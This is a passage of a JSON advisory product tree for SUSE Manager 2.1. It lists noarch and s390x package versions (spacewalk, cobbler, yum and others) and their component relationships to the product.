"name": "spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"product_id": "spacewalk-java-lib-2.1.165.14-0.7.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"product": {
"name": "spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"product_id": "spacewalk-java-oracle-2.1.165.14-0.7.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"product": {
"name": "spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"product_id": "spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"product": {
"name": "spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"product_id": "spacewalk-pxt-2.1.60.12-0.7.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-reports-2.1.14.8-0.7.10.noarch",
"product": {
"name": "spacewalk-reports-2.1.14.8-0.7.10.noarch",
"product_id": "spacewalk-reports-2.1.14.8-0.7.10.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-search-2.1.14.6-0.7.18.noarch",
"product": {
"name": "spacewalk-search-2.1.14.6-0.7.18.noarch",
"product_id": "spacewalk-search-2.1.14.6-0.7.18.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-setup-2.1.14.9-0.7.6.noarch",
"product": {
"name": "spacewalk-setup-2.1.14.9-0.7.6.noarch",
"product_id": "spacewalk-setup-2.1.14.9-0.7.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"product": {
"name": "spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"product_id": "spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"product": {
"name": "spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"product_id": "spacewalk-sniglets-2.1.60.12-0.7.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"product": {
"name": "spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"product_id": "spacewalk-taskomatic-2.1.165.14-0.7.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-utils-2.1.27.12-0.7.25.noarch",
"product": {
"name": "spacewalk-utils-2.1.27.12-0.7.25.noarch",
"product_id": "spacewalk-utils-2.1.27.12-0.7.25.noarch"
}
},
{
"category": "product_version",
"name": "struts-1.2.9-162.33.22.noarch",
"product": {
"name": "struts-1.2.9-162.33.22.noarch",
"product_id": "struts-1.2.9-162.33.22.noarch"
}
},
{
"category": "product_version",
"name": "supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"product": {
"name": "supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"product_id": "supportutils-plugin-susemanager-1.0.3-0.5.5.noarch"
}
},
{
"category": "product_version",
"name": "supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"product": {
"name": "supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"product_id": "supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"product": {
"name": "susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"product_id": "susemanager-client-config_en-pdf-2.1-0.15.24.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-install_en-pdf-2.1-0.15.24.noarch",
"product": {
"name": "susemanager-install_en-pdf-2.1-0.15.24.noarch",
"product_id": "susemanager-install_en-pdf-2.1-0.15.24.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-jsp_en-2.1-0.15.23.noarch",
"product": {
"name": "susemanager-jsp_en-2.1-0.15.23.noarch",
"product_id": "susemanager-jsp_en-2.1-0.15.23.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-manuals_en-2.1-0.15.24.noarch",
"product": {
"name": "susemanager-manuals_en-2.1-0.15.24.noarch",
"product_id": "susemanager-manuals_en-2.1-0.15.24.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"product": {
"name": "susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"product_id": "susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"product": {
"name": "susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"product_id": "susemanager-reference_en-pdf-2.1-0.15.24.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-schema-2.1.50.11-0.7.8.noarch",
"product": {
"name": "susemanager-schema-2.1.50.11-0.7.8.noarch",
"product_id": "susemanager-schema-2.1.50.11-0.7.8.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-sync-data-2.1.5-0.7.6.noarch",
"product": {
"name": "susemanager-sync-data-2.1.5-0.7.6.noarch",
"product_id": "susemanager-sync-data-2.1.5-0.7.6.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-user_en-pdf-2.1-0.15.24.noarch",
"product": {
"name": "susemanager-user_en-pdf-2.1-0.15.24.noarch",
"product_id": "susemanager-user_en-pdf-2.1-0.15.24.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "apache2-mod_wsgi-3.3-5.7.17.s390x",
"product": {
"name": "apache2-mod_wsgi-3.3-5.7.17.s390x",
"product_id": "apache2-mod_wsgi-3.3-5.7.17.s390x"
}
},
{
"category": "product_version",
"name": "cobbler-2.2.2-0.54.9.s390x",
"product": {
"name": "cobbler-2.2.2-0.54.9.s390x",
"product_id": "cobbler-2.2.2-0.54.9.s390x"
}
},
{
"category": "product_version",
"name": "libyaml-0-2-0.1.3-0.10.16.11.s390x",
"product": {
"name": "libyaml-0-2-0.1.3-0.10.16.11.s390x",
"product_id": "libyaml-0-2-0.1.3-0.10.16.11.s390x"
}
},
{
"category": "product_version",
"name": "postgresql91-pltcl-9.1.15-0.3.1.s390x",
"product": {
"name": "postgresql91-pltcl-9.1.15-0.3.1.s390x",
"product_id": "postgresql91-pltcl-9.1.15-0.3.1.s390x"
}
},
{
"category": "product_version",
"name": "python-enum34-1.0-0.7.33.s390x",
"product": {
"name": "python-enum34-1.0-0.7.33.s390x",
"product_id": "python-enum34-1.0-0.7.33.s390x"
}
},
{
"category": "product_version",
"name": "python-gzipstream-1.10.2.2-0.7.6.s390x",
"product": {
"name": "python-gzipstream-1.10.2.2-0.7.6.s390x",
"product_id": "python-gzipstream-1.10.2.2-0.7.6.s390x"
}
},
{
"category": "product_version",
"name": "rhnlib-2.5.69.6-0.7.6.s390x",
"product": {
"name": "rhnlib-2.5.69.6-0.7.6.s390x",
"product_id": "rhnlib-2.5.69.6-0.7.6.s390x"
}
},
{
"category": "product_version",
"name": "smdba-1.5.1-0.7.6.s390x",
"product": {
"name": "smdba-1.5.1-0.7.6.s390x",
"product_id": "smdba-1.5.1-0.7.6.s390x"
}
},
{
"category": "product_version",
"name": "spacecmd-2.1.25.7-0.7.9.s390x",
"product": {
"name": "spacecmd-2.1.25.7-0.7.9.s390x",
"product_id": "spacecmd-2.1.25.7-0.7.9.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-app-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-applet-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-iss-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-libs-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-server-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-sql-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-tools-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"product": {
"name": "spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"product_id": "spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "spacewalk-branding-2.1.33.10-0.7.16.s390x",
"product": {
"name": "spacewalk-branding-2.1.33.10-0.7.16.s390x",
"product_id": "spacewalk-branding-2.1.33.10-0.7.16.s390x"
}
},
{
"category": "product_version",
"name": "spacewalksd-5.0.14.6-0.7.15.s390x",
"product": {
"name": "spacewalksd-5.0.14.6-0.7.15.s390x",
"product_id": "spacewalksd-5.0.14.6-0.7.15.s390x"
}
},
{
"category": "product_version",
"name": "suseRegisterInfo-2.1.9-0.7.29.s390x",
"product": {
"name": "suseRegisterInfo-2.1.9-0.7.29.s390x",
"product_id": "suseRegisterInfo-2.1.9-0.7.29.s390x"
}
},
{
"category": "product_version",
"name": "susemanager-2.1.17-0.7.11.s390x",
"product": {
"name": "susemanager-2.1.17-0.7.11.s390x",
"product_id": "susemanager-2.1.17-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "susemanager-tools-2.1.17-0.7.11.s390x",
"product": {
"name": "susemanager-tools-2.1.17-0.7.11.s390x",
"product_id": "susemanager-tools-2.1.17-0.7.11.s390x"
}
},
{
"category": "product_version",
"name": "tanukiwrapper-3.2.3-0.10.12.s390x",
"product": {
"name": "tanukiwrapper-3.2.3-0.10.12.s390x",
"product_id": "tanukiwrapper-3.2.3-0.10.12.s390x"
}
},
{
"category": "product_version",
"name": "yum-3.2.29-0.19.30.s390x",
"product": {
"name": "yum-3.2.29-0.19.30.s390x",
"product_id": "yum-3.2.29-0.19.30.s390x"
}
},
{
"category": "product_version",
"name": "yum-common-3.2.29-0.19.30.s390x",
"product": {
"name": "yum-common-3.2.29-0.19.30.s390x",
"product_id": "yum-common-3.2.29-0.19.30.s390x"
}
},
{
"category": "product_version",
"name": "zypp-plugin-spacewalk-0.9.8-0.15.51.s390x",
"product": {
"name": "zypp-plugin-spacewalk-0.9.8-0.15.51.s390x",
"product_id": "zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager 2.1",
"product": {
"name": "SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-server:2.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "apache2-mod_wsgi-3.3-5.7.17.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x"
},
"product_reference": "apache2-mod_wsgi-3.3-5.7.17.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
},
"product_reference": "auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
},
"product_reference": "auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
},
"product_reference": "auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
},
"product_reference": "auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
},
"product_reference": "auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-2.2.2-0.54.9.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x"
},
"product_reference": "cobbler-2.2.2-0.54.9.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "google-gson-2.2.4-0.7.52.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch"
},
"product_reference": "google-gson-2.2.4-0.7.52.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libyaml-0-2-0.1.3-0.10.16.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x"
},
"product_reference": "libyaml-0-2-0.1.3-0.10.16.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "oracle-config-1.1-0.10.10.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch"
},
"product_reference": "oracle-config-1.1-0.10.10.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "osa-dispatcher-5.11.33.7-0.7.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch"
},
"product_reference": "osa-dispatcher-5.11.33.7-0.7.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-Class-Singleton-1.4-4.13.38.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch"
},
"product_reference": "perl-Class-Singleton-1.4-4.13.38.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch"
},
"product_reference": "perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-Satcon-1.20.2-0.7.6.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch"
},
"product_reference": "perl-Satcon-1.20.2-0.7.6.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
},
"product_reference": "perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "postgresql91-pltcl-9.1.15-0.3.1.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x"
},
"product_reference": "postgresql91-pltcl-9.1.15-0.3.1.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pxe-default-image-0.1-0.20.56.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch"
},
"product_reference": "pxe-default-image-0.1-0.20.56.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-enum34-1.0-0.7.33.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x"
},
"product_reference": "python-enum34-1.0-0.7.33.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-gzipstream-1.10.2.2-0.7.6.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x"
},
"product_reference": "python-gzipstream-1.10.2.2-0.7.6.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhn-custom-info-5.4.22.6-0.7.13.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch"
},
"product_reference": "rhn-custom-info-5.4.22.6-0.7.13.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhnlib-2.5.69.6-0.7.6.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x"
},
"product_reference": "rhnlib-2.5.69.6-0.7.6.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhnmd-5.3.18.4-0.7.15.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch"
},
"product_reference": "rhnmd-5.3.18.4-0.7.15.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhnpush-5.5.71.7-0.7.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch"
},
"product_reference": "rhnpush-5.5.71.7-0.7.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "sm-ncc-sync-data-2.1.9-0.7.6.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch"
},
"product_reference": "sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "smdba-1.5.1-0.7.6.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x"
},
"product_reference": "smdba-1.5.1-0.7.6.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-2.1.25.7-0.7.9.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x"
},
"product_reference": "spacecmd-2.1.25.7-0.7.9.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-admin-2.1.2.4-0.7.6.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch"
},
"product_reference": "spacewalk-admin-2.1.2.4-0.7.6.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-app-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-applet-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-iss-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-libs-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-server-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-sql-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-tools-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
